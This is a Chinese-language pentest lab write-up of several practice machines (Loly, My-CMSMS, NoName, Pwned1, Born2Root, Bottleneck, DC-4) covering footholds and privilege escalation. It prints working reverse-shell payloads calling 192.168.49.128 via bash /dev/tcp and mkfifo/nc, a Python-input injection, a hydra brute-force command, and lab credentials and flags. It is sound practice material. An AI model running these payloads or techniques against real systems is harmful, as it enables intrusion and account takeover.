![](https://i.imgur.com/Sboxesu.png) 拿這串憑證登入就能進Dashboard了 `loly:fernando` ![](https://i.imgur.com/aBXW5aC.png) 但因為不知道為什麼 不能改theme的原碼也不能裝plugin 最後在AdRotate的Manage Media翻到一個可以上傳東西的地方 只限制圖片或是zip zip在上傳以後會自動解壓縮然後刪除 ![](https://i.imgur.com/I4eF80c.png) 先寫一個reverse shell 然後塞到zip裡面上傳 ![](https://i.imgur.com/Cr842k1.png) ![](https://i.imgur.com/eXzEOTX.png) 但不知道上傳以後會丟到哪邊 [爬了一下文](https://ajdg.solutions/support/adrotate-manuals/manage-banner-images/)以後發現會到`/wp-content/banners`下面 用curl戳就RCE了 ![](https://i.imgur.com/Mn9QHqY.png) #### 橫向移動 loly `wp-config.php`裡面有一個可疑的密碼 ![](https://i.imgur.com/SoKCTiB.png) 拿去`su loly`就可以ㄌ `loly:lolyisabeautifulgirl` ![](https://i.imgur.com/QxyMCaU.png) #### 垂直移動 root linPEAS內建的lse推薦CVE-2017-16995 ![](https://i.imgur.com/rw2PBnV.png) 把原始碼丟過去編譯後執行就是root了 ![](https://i.imgur.com/tXw6pSV.png) #### Proof local.txt `622501eb0c09d36f08666647d46f1e77` ![](https://i.imgur.com/LD6GWP1.png) proof.txt `58a54e0622aefc0e20382f763701da98` ![](https://i.imgur.com/XxfFBoI.png) ----- ### My-CMSMS 看起來要打Web ![](https://i.imgur.com/WrzZvOz.png) 連上後可以在網頁的底下翻到版本是2.2.13 但沒有對應這版本的exploit ![](https://i.imgur.com/mxhMDXy.png) 掃路徑可以看到幾個比較可疑的 `/admin`是登入介面 ![](https://i.imgur.com/20XocLB.png) ![](https://i.imgur.com/RuYBLlY.png) 感覺Web不太能打 試試看MySQL 結果矇到`root:root`這個憑證進去 ![](https://i.imgur.com/VFhdTS7.png) 在這邊可以直接翻到admin的密碼hash 但Crackstation炸不出來 ![](https://i.imgur.com/ynJSSAZ.png) ![](https://i.imgur.com/ulQyF40.png) 直接生一個新密碼出來覆蓋它 ![](https://i.imgur.com/cce53IJ.png) ![](https://i.imgur.com/lhBq0fu.png) 但不能登入???? ![](https://i.imgur.com/qagUTLL.png) 經過了幾分鐘的搜尋 [在這個網站](https://cmscanbesimple.org/blog/cms-made-simple-admin-password-recovery)找到了正常重製密碼的方式 ``` update cms_users set password = (select md5(CONCAT(IFNULL((SELECT sitepref_value FROM cms_siteprefs WHERE sitepref_name = 'sitemask'),''),'meow'))) where username = 'admin'; admin:meow ``` 查了以後發現hash跟剛剛的長的不一樣 感覺應該是特規的MD5 重新登入以後終於能進Dashboard了 ![](https://i.imgur.com/lBsY4AW.png) ![](https://i.imgur.com/fSLxYHt.png) 到Extensions > User Defined Tags可以看到一些設定檔 點進去看了一下感覺是php的程式碼 上面還有一個Run ![](https://i.imgur.com/uHlsy3w.png) ![](https://i.imgur.com/07CHZwb.png) 改成Reverse shell以後run就RCE了 ![](https://i.imgur.com/hlHQswH.png) #### 橫向移動 armour 跑linPEAS的時候找到一個看起來像Base64的東西 感覺很可疑 丟到CyberChif用他的自動decode可以噴出一個憑證 ![](https://i.imgur.com/aJpVsUt.png) ![](https://i.imgur.com/9CvYVRt.png) `armour:Shield@123` ![](https://i.imgur.com/vxV5FaS.png) #### 垂直移動 root 在armour的時候`sudo -l` 發現能用python 直接生一個shell出來就是root了 ![](https://i.imgur.com/x03l3y0.png) #### Proof local.txt `c6a96658e06eb514df9cb2cdf9877bf0` ![](https://i.imgur.com/PU5Aij1.png) proof.txt `e819397c69b95e1b4f9d5b9e1b2f6859` ![](https://i.imgur.com/4ZC82T6.png) ----- ### NoName 只開80 ![](https://i.imgur.com/3zMZtB2.png) 直接開感覺是SQL Injection或是Command Injection ![](https://i.imgur.com/k6HarxO.png) 掃路徑可以看到可疑的東西跑出來 `/admin`看起來很沒用 但`superadmin.php`看起來有東西 ![](https://i.imgur.com/VTZPsY5.png) ![](https://i.imgur.com/tH9joPQ.png) ![](https://i.imgur.com/ag1yPa5.png) 用了以後感覺這可以做Command Injection ![](https://i.imgur.com/a9uPAMT.png) 經過了多次實驗 發現`%0a`可以bypass過濾成功做到Command Injection 直接把`superadmin.php`開起來看原始碼 ![](https://i.imgur.com/rsYnzSj.png) ![](https://i.imgur.com/M18rxMe.png) 看了過濾的wordlist 沒有禁管道符 所以我用了base64先encode我的payload 等丟過去以後再decode執行 實驗證明這是可以成功的 ![](https://i.imgur.com/EcojhHC.png) #### 提權 跑linPEAS 發現find有SUID權限 ![](https://i.imgur.com/OhyFT25.png) ![](https://i.imgur.com/1sry0Oq.png) #### Proof local.txt `03330e3dbe0403b358d7d9f879235d24` ![](https://i.imgur.com/jIjSHv8.png) proof.txt `874244546813b4735be75eaf8d39878f` ![](https://i.imgur.com/gpAht4N.png) ----- ### Pwned1 打Web ![](https://i.imgur.com/4Fhgoob.png) 掃了一下路徑發現 ![](https://i.imgur.com/fa2lrGY.png) ![](https://i.imgur.com/SvsX0Pf.png) ![](https://i.imgur.com/TngL3oo.png) ![](https://i.imgur.com/B8BbwAw.png) ![](https://i.imgur.com/vFPQSV6.png) ![](https://i.imgur.com/b1UhwgZ.png) ![](https://i.imgur.com/15TIel4.png) ![](https://i.imgur.com/hFmfmUS.png) ![](https://i.imgur.com/0NVd5mG.png) ![](https://i.imgur.com/WWWI9Z9.png) ![](https://i.imgur.com/lZQy3fc.png) #### 橫向移動 selena `sudo -l`發現可以用selena的權限運行`messenger.sh` 打開那個.sh發現他會把輸入的東西直接執行 照理來說應該能做Command Injection ![](https://i.imgur.com/AZI2cNb.png) `sudo -u selena /home/messenger.sh` 進去打`/bin/bash`就拿到selena身分的Shell了 但介面太醜所以打一個Reverse shell回來 ![](https://i.imgur.com/ad5Imqr.png) #### 垂直移動 root 跑linPEAS 發現自己有docker的group 去GTFOBins上找發現有一個可以生shell的指令 打上去就是root了 ![](https://i.imgur.com/OZIbwPd.png) ![](https://i.imgur.com/x35AbYv.png) ![](https://i.imgur.com/WKsnony.png) #### Proof local.txt `a171dc47b3c1a69531534d05c072f5bf` ![](https://i.imgur.com/QWjficJ.png) proof.txt `0fe01aeb707913c4f456654897e66eac` ![](https://i.imgur.com/dZiglzW.png) ----- ### Born2Root 開奇怪的Port ![](https://i.imgur.com/bT271BU.png) 直接開網頁可以看到有3個username 應該能記錄下來 ![](https://i.imgur.com/3kkCXMj.png) 試用了新工具 感覺比dirsearch好用 可以開多線程跑下去遞歸掃 ![](https://i.imgur.com/YiyUviU.png) `/files`直接是空的 ![](https://i.imgur.com/hq8ScwT.png) 在`/icons`裡面看到一個長的很奇怪的txt 打開以後發現是`id_rsa` 回想起剛剛看到的username 試了一下發現可以登入 但要密碼 ![](https://i.imgur.com/r2f8BvD.png) ![](https://i.imgur.com/vwLKOLe.png) ![](https://i.imgur.com/jU7RnQQ.png) ???? 密碼根本是騙人的 ![](https://i.imgur.com/AXJNtmT.png) #### 橫向移動 jimmy 跑linPEAS 發現有一個py在tmp下執行 但那邊根本沒有這個檔案 ![](https://i.imgur.com/nSG2dpj.png) 用python寫一個reverse shell等他過幾分鐘就收到shell了 ![](https://i.imgur.com/XssNsJQ.png) ![](https://i.imgur.com/eSJxGSr.png) #### 垂直移動 root 壞掉的正常路徑 在jimmy的home下可以發現一個`network` 對他strings可以發現裡面引用到的echo沒有包含絕對路徑 可以做Path Hijacking ![](https://i.imgur.com/QouGz3L.png) ![](https://i.imgur.com/lThWYCW.png) 但不知道為什麼不能執行成功 看了write up覺得這台機器根本壞了== ![](https://i.imgur.com/sosLgWE.png) #### 橫向移動 hadi 直接`su hadi` 然後密碼是`hadi123` ㄏㄏㄏㄏㄏㄏ ![](https://i.imgur.com/fsoBg7U.png) #### 垂直移動 root 直接`su root` 然後密碼是`hadi123` ㄏㄏㄏㄏㄏㄏ ![](https://i.imgur.com/eIxDH11.png) #### Proof local.txt `0c7b703ce62aa00b6e5d35327f22fb86` ![](https://i.imgur.com/pkm2Iek.png) proof.txt `dda5d41f40f463b774eee640585a872e` ![](https://i.imgur.com/KleOxOQ.png) ----- ### Bottleneck ![](https://i.imgur.com/3Y4mD3x.png) ![](https://i.imgur.com/mo2QGG6.png) ![](https://i.imgur.com/8iYvsAd.png) ![](https://i.imgur.com/VEMIp5c.png) image_gallery_load.php ```php= <?php function print_troll(){ $messages = $GLOBALS['messages']; $troll = $GLOBALS['troll']; echo $messages[0]; echo $troll; } $troll = <<<EOT <pre> _,..._ /__ \ >< `. \ /_ \ | \-_ /:| ,--'..'. : ,' `. _,' \ _.._,--'' , | , ,',, _| _,.'| | | \\||/,'(,' '--'' | | | _ ||| | /-' | | | (- -)<`._ | / / | | \_\O/_/`-.(<< |____/ / | | / \ / -'| `--.'| | | \___/ / / | | H H / | | |_|_..-H-H--.._ / ,| | |-.._"_"__..-| | _-/ | | | | | | \_ | | | | | | | | | |____| | | | | _..' | |____| | |_(____..._' _.' | `-..______..-'"" (___..--' <pre> EOT; if(!isset($_GET['t']) || !isset($_GET['f'])){ exit(); } $imagefile = base64_decode($_GET['f']); $timestamp = time(); $isblocked = FALSE; $blacklist = array('/etc','/opt','/var','/opt','/proc','/dev','/lib','/bin','/usr','/home','/ids'); $messages = array("\nLet me throw away your nice request into the bin.\n". "The SOC was informed about your attempt to break into this site. Thanks to previous attackers effort in smashing my infrastructructure I will take strong legal measures.\n". "Why don't you wait on your chair until someone (maybe the police) knock on your door?\n\n"); if(abs($_GET['t'] - $timestamp) > 10){ exit(); } foreach($blacklist as $elem){ if(strstr($imagefile, $elem) !== FALSE) $isblocked = TRUE; } // report the intrusion to the soc and save information locally for further investigation if($isblocked){ $logfile = 'intrusion_'.$timestamp; $fp = fopen('/var/log/soc/'.$logfile, 'w'); fwrite($fp, "'".$imagefile."'"); fclose($fp); exec('python /opt/ids_strong_bvb.py </var/log/soc/'.$logfile.' >/tmp/output 2>&1'); print_troll(); exit(); } chdir('img'); $filecontent = file_get_contents($imagefile); if($filecontent === FALSE){ print_troll(); } else{ echo $filecontent; } chdir('../'); ?> ``` 分析了上面的code可以發現裡面有一個過濾器 如果輸入黑名單裡面的內容的話會把我們的整串輸入寫入到一個檔案裡面 然後再用python執行某檔案把剛剛的內容當做參數傳入裡面 最後再把輸出丟到`/tmp/output`裡面 因為`/tmp`沒有包在黑名單內 嘗試戳一下輸出 感覺像是把整串文字都塞進去? ![](https://i.imgur.com/wXH2Lpc.png) 感覺有機會可以在裡面塞php的code然後RCE `/etc/passwd <?php system("bash -c 'bash -i >& /dev/tcp/192.168.49.128/443 0>&!'")?>` 對上面這串Payload做Base64以後塞進去 然後讀了output 發現他好像會把東西塞到input裡面(? ![](https://i.imgur.com/bM1VJPV.png) 查了一下關於Python input exploit的相關資料後找到[這個網站](https://sevenlayers.com/index.php/215-abusing-python-input) 裡面有提到可能可以使用類似`__import__('os').system('....')`之類的東西來對目標RCE 經過了超級多次的嘗試以及在本地的測試後終於發現能成功用下面這段Payload取得RCE (累死==) ``` ' and __import__("os").system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.49.128 443 >/tmp/f ; # /etc/passwd") and ' ``` ![](https://i.imgur.com/JjDqouE.png) #### 橫向移動 bytevsbyte ![](https://i.imgur.com/V9Mpfto.png) #### 垂直移動 root ![](https://i.imgur.com/6bwu6Og.png) #### Proof local.txt `f992844048bbf715c32740d5a5492e85` ![](https://i.imgur.com/4w6Dyrr.png) ----- ### DC-4 打 Web ㄉ機器 ![](https://i.imgur.com/NgQgYmz.png) ![](https://i.imgur.com/T3KOAwz.png) 挖一進來直接登入介面糊你滿臉餒 ![](https://i.imgur.com/5WduJJl.png) 但不管掃呀掃 掃到天荒地老都沒找到可以利用的點 不過有發現 `command.php` 超級可疑 ![](https://i.imgur.com/rQZ1Wmy.png) 直接戳的話他會把我們帶回 `index.php`, 不過這邊可以嘗試把這條 header 弄掉 ![](https://i.imgur.com/7zT7Vki.png) 我們可以停留在一個奇怪的表單頁面 看起來是可以做 Command Injection ? 可能他不會檢查有沒有過 Authentication 導致我們可以直接戳出一個 Request ? ![](https://i.imgur.com/edmWTfO.png) 丟一個 Request 出去後一樣拔掉 `Localtion: index.php` 這個 header, 可以發現挖什麼事都沒發生 ![](https://i.imgur.com/vQGNbEi.png) 不過可能可以猜測他後面其實有執行但沒回顯(? 不管 先打一個 reverse shell 看看 ![](https://i.imgur.com/qIox5n3.png) 嗯 非常不易外的什麼都沒收到呢 在這之後換ㄌ好幾個 reverse shell 的 payload 也做ㄌ好幾種測試 但都不能打一個 reverse shell 回來 可能剛剛的登入頁面才是正規解(? 嘗試注ㄌ一些奇怪的 payload 都沒有戳出一個登入成功 欸不是 中等難度的機器還要爆破喔 ``` hydra -l admin -P ~/Tools/Wordlists/Password/rockyou.txt 192.168.76.195 http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout" -I -t 64 ``` ![](https://i.imgur.com/ahBAyRW.png) 哭阿真的是用爆破== 而且沒回顯錯誤訊息的登入介面拿 hydra 炸用起來真的好抖 這邊 `S=logout` 是猜他登入成功後會出現這ㄍ字 噁心貓咪 拿到ㄌ管理員後不易外ㄉ三秒就出 RCE ㄌ ![](https://i.imgur.com/GWX3bIP.png) Persist ㄉ部分一樣用 reverse-sshx86 ㄅ ![](https://i.imgur.com/odIalAE.png) #### Privesc - jim 懶ㄉ慢慢找 直接跑一個 linPEAS 發現一個超可疑的東西 ![](https://i.imgur.com/kZFaG8Q.png) 25 只對內開 怪貓咪 ![](https://i.imgur.com/Jfx9M5n.png) 原本想說寫一ㄍ `/bin/bash` 進去 但一寫直接沒 SUID ㄌ 哭阿 ![](https://i.imgur.com/7kHDaN6.png) 不過在他的 `backup` 目錄下有發現一個神奇的 wordlist ![](https://i.imgur.com/bMjUdq3.png) 拿 hydra 去炸一下可以直接拿到 jim ㄉ credential `jim:jibril04` ![](https://i.imgur.com/HZIwec4.png) `su jim` 以後就是他ㄌ ![](https://i.imgur.com/VjDoCLr.png) #### Privesc - charles 在 `/home/jim` 裡面可以看到一ㄍ只有 jim 才能讀的 mbox 打開以後感覺很亂 裡面就 `This is test` 怪貓咪 ![](https://i.imgur.com/InCY4dw.png) 不過剛剛在跑 linPEAS 的時候有看到 25 是只對內 感覺可疑 打一ㄍ Tunnel 出來掃好ㄌ ![](https://i.imgur.com/nd0VfrS.png) 掃了一下後拿版本去查可以發現有一個 RCE 的 exploit ![](https://i.imgur.com/qEtv7gy.png) 改ㄌ一下就能直接用ㄌ ![](https://i.imgur.com/NlLEndr.png) ![](https://i.imgur.com/ElcJRPR.png) 不過等呀等 等到天荒地老還是只停在第二步 可能要換一個 exploit ![](https://i.imgur.com/1JEf57u.png) 直接拿著這根 CVE 編號去查ㄌ一下 發現第一個是自己公司的網址(? ![](https://i.imgur.com/TwRN1XU.png) 原來這ㄍ洞是隔壁 Research Team 找ㄉ ~~不知道能不能借一下 exploit~~ ![](https://i.imgur.com/s1pF9lb.png) 之後翻了翻 有翻到一個 [github](https://github.com/synacktiv/Exim-CVE-2018-6789) 的 但他這邊要提供 acl pointers 欸該不會這是兔子洞ㄅ ![](https://i.imgur.com/8lePVd1.png) 想說看有沒有更多信 所以跑去ㄌ `/var/mail` 下 打開 jim 的信後發現 charles 把自己的密碼 leak 了 `charles:^xHhA&hvim0y` ![](https://i.imgur.com/sZhO4Uz.png) 完蛋 charles 你要被炒了 ![](https://i.imgur.com/OqgO6wK.png) #### Privesc - root `sudo -l` ㄉ話可以看到他有開一個叫 `teehee` ㄉ binary 但在 GTFOBins 上找不到這個東西 不過有一個倒是蠻像ㄉ https://gtfobins.github.io/gtfobins/tee/ 試著用ㄌ一下後發現他好像會把輸入ㄉ東西輸出 一開始想說要打胖 但應該不會那麼狠ㄅ 不過 `-a` 可以看到他會把東西加到檔案裡面 可能可以利用(? ![](https://i.imgur.com/xmTqHbr.png) 出於好奇原因 所以跑去看ㄌ一下 tee ㄉ頁面 發現這東西好像就是 tee(?) ![](https://i.imgur.com/SOSOGsN.png) 戳一ㄍ帳號到 `/etc/passwd` 以後 `su` 他就是 root ㄌ ![](https://i.imgur.com/D20OQN3.png) #### Proof local.txt `4063d1a141f4bc4aee31ecc71cfa3839` ![](https://i.imgur.com/I5KFRYy.png) proof.txt `ae757af4b1403f7b955f01b72a9923b4` ![](https://i.imgur.com/cKsBe5T.png) -----